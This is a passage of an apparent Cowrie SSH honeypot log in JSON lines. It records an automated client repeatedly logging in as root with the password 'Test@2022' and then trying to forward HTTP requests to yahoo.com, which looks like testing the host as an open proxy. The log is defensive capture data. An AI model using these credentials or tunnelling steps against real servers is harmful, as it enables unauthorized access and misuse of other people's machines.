rg","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:47.242487Z","src_ip":"213.209.150.239","session":"59f3a1655284"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:47.525699Z","src_ip":"213.209.150.239","session":"59f3a1655284"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":9189,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:9189","sensor":"my-vps","timestamp":"2025-08-26T00:56:47.584150Z","session":"59f3a1655284"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:47.641029Z","src_ip":"213.209.150.239","session":"59f3a1655284"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":26712,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:26712","sensor":"my-vps","timestamp":"2025-08-26T00:56:47.795040Z","session":"59f3a1655284"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:47.851739Z","src_ip":"213.209.150.239","session":"59f3a1655284"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:47.908989Z","src_ip":"213.209.150.239","session":"59f3a1655284"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57585,"dst_ip":"1.2.3.4","dst_port":22,"session":"aebea2d1d03a","protocol":"ssh","message":"New connection: 213.209.150.239:57585 (1.2.3.4:22) [session: aebea2d1d03a]","sensor":"my-vps","timestamp":"2025-08-26T00:56:47.954910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:47.955649Z","src_ip":"213.209.150.239","session":"aebea2d1d03a"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:48.002733Z","src_ip":"213.209.150.239","session":"aebea2d1d03a"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:48.236387Z","src_ip":"213.209.150.239","session":"aebea2d1d03a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":10365,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:10365","sensor":"my-vps","timestamp":"2025-08-26T00:56:48.284024Z","session":"aebea2d1d03a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:48.330963Z","src_ip":"213.209.150.239","session":"aebea2d1d03a"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":16176,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:16176","sensor":"my-vps","timestamp":"2025-08-26T00:56:48.465294Z","session":"aebea2d1d03a"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:48.512376Z","src_ip":"213.209.150.239","session":"aebea2d1d03a"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:48.560153Z","src_ip":"213.209.150.239","session":"aebea2d1d03a"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57630,"dst_ip":"1.2.3.4","dst_port":22,"session":"93b2cd2ba0da","protocol":"ssh","message":"New connection: 213.209.150.239:57630 (1.2.3.4:22) [session: 93b2cd2ba0da]","sensor":"my-vps","timestamp":"2025-08-26T00:56:48.606613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:48.607701Z","src_ip":"213.209.150.239","session":"93b2cd2ba0da"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:48.654894Z","src_ip":"213.209.150.239","session":"93b2cd2ba0da"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:48.889196Z","src_ip":"213.209.150.239","session":"93b2cd2ba0da"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":11426,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:11426","sensor":"my-vps","timestamp":"2025-08-26T00:56:48.937252Z","session":"93b2cd2ba0da"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:48.984912Z","src_ip":"213.209.150.239","session":"93b2cd2ba0da"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"213.209.150.239","src_port":21667,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:21667","sensor":"my-vps","timestamp":"2025-08-26T00:56:49.121503Z","session":"93b2cd2ba0da"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:49.168686Z","src_ip":"213.209.150.239","session":"93b2cd2ba0da"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:49.217224Z","src_ip":"213.209.150.239","session":"93b2cd2ba0da"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57678,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f6c43640873","protocol":"ssh","message":"New connection: 213.209.150.239:57678 (1.2.3.4:22) [session: 9f6c43640873]","sensor":"my-vps","timestamp":"2025-08-26T00:56:49.263605Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:49.264475Z","src_ip":"213.209.150.239","session":"9f6c43640873"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:49.311905Z","src_ip":"213.209.150.239","session":"9f6c43640873"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:49.546902Z","src_ip":"213.209.150.239","session":"9f6c43640873"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"213.209.150.239","src_port":19521,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:19521","sensor":"my-vps","timestamp":"2025-08-26T00:56:49.594904Z","session":"9f6c43640873"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:49.642104Z","src_ip":"213.209.150.239","session":"9f6c43640873"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":6452,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:6452","sensor":"my-vps","timestamp":"2025-08-26T00:56:49.777551Z","session":"9f6c43640873"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:49.824761Z","src_ip":"213.209.150.239","session":"9f6c43640873"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:49.872800Z","src_ip":"213.209.150.239","session":"9f6c43640873"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57728,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe3d8f7c2532","protocol":"ssh","message":"New connection: 213.209.150.239:57728 (1.2.3.4:22) [session: fe3d8f7c2532]","sensor":"my-vps","timestamp":"2025-08-26T00:56:49.919291Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:49.928230Z","src_ip":"213.209.150.239","session":"fe3d8f7c2532"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:49.966532Z","src_ip":"213.209.150.239","session":"fe3d8f7c2532"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:50.201185Z","src_ip":"213.209.150.239","session":"fe3d8f7c2532"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":6650,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:6650","sensor":"my-vps","timestamp":"2025-08-26T00:56:50.249785Z","session":"fe3d8f7c2532"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:50.297287Z","src_ip":"213.209.150.239","session":"fe3d8f7c2532"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":17298,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:17298","sensor":"my-vps","timestamp":"2025-08-26T00:56:50.441440Z","session":"fe3d8f7c2532"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:50.488622Z","src_ip":"213.209.150.239","session":"fe3d8f7c2532"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:56:50.536682Z","src_ip":"213.209.150.239","session":"fe3d8f7c2532"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":57778,"dst_ip":"1.2.3.4","dst_port":22,"session":"916873038af5","protocol":"ssh","message":"New connection: 213.209.150.239:57778 (1.2.3.4:22) [session: 916873038af5]","sensor":"my-vps","timestamp":"2025-08-26T00:56:50.592245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:56:50.593005Z","src_ip":"213.209.150.239","session":"916873038af5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:56:50.649695Z","src_ip":"213.209.150.239","session":"916873038af5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:56:50.932274Z","src_ip":"213.209.150.239","session":"916873038af5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":2606,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:2606","sensor":"my-vps","timestamp":"2025-08-26T00:56:50.990060Z","session":"916873038af5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:56:51.046773Z","src_ip":"213.209.150.239","session":"916873038af5"}
